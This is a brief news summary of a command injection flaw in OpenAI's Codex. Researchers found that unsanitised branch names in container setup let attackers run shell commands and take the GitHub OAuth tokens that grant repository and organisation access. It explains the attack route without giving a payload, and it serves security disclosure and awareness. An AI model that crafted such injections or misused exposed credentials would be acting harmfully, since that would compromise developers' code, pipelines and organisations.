OpenAI Codex Had a Command Injection Bug That Could Steal GitHub Tokens
A vulnerability was discovered in OpenAI's Codex that allowed attackers to inject arbitrary shell commands through malicious branch names, exposing GitHub OAuth tokens with broad permissions.
Why it matters
This vulnerability highlights the security risks associated with AI coding tools that have broad access to developer credentials and execution environments.
Key Points
- 1Codex had a command injection vulnerability in branch name handling
- 2Attackers could craft malicious branch names to execute arbitrary commands
- 3The commands had access to Codex's GitHub OAuth tokens with read/write and organization-level permissions
- 4The vulnerability affected the Codex web interface, CLI, SDK, and IDE integrations
Details
The vulnerability was discovered by security researchers at BeyondTrust's Phantom Labs. Codex runs tasks inside managed containers that clone the user's GitHub repository and authenticate using short-lived OAuth tokens. However, the branch names were not properly sanitized before being passed to shell commands during the environment setup process. An attacker could exploit this to inject arbitrary shell commands that would execute inside the container with access to the GitHub token. This could allow the attacker to gain full read/write access to the repositories, trigger workflow actions (e.g., CI/CD pipelines), and potentially access organization-level resources depending on the token's scope. The researchers note that this type of vulnerability is often overlooked by 'vibe coders' who may not review branch names for injection payloads, audit tool permissions, or fully understand the security implications of AI coding assistants.
No comments yet
Be the first to comment